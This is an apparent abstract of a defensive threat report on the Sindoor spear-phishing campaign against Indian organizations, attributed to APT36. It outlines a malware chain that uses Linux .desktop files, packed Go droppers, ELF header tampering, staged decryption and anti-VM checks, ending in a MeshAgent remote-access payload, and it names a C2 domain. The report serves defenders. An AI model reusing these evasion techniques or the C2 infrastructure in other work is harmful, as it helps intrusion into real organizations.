Sindoor Dropper: New Phishing Campaign

This report analyzes a targeted spear‑phishing campaign (Sindoor) against Indian organizations that abuses Linux .desktop files to run an obfuscated multi-stage dropper chain (packed Go binaries with UPX, ELF magic stripping/restoration, AES/DES decryption stages and anti‑VM checks) and ultimately installs a MeshAgent remote‑access payload connecting to a documented C2 (wss://...indianbosssystems.ddns.net). The report provides full technical breakdowns, file hashes, YARA rules, decoded module routines, and recommended detection/mitigation artifacts, and links the tradecraft to APT36.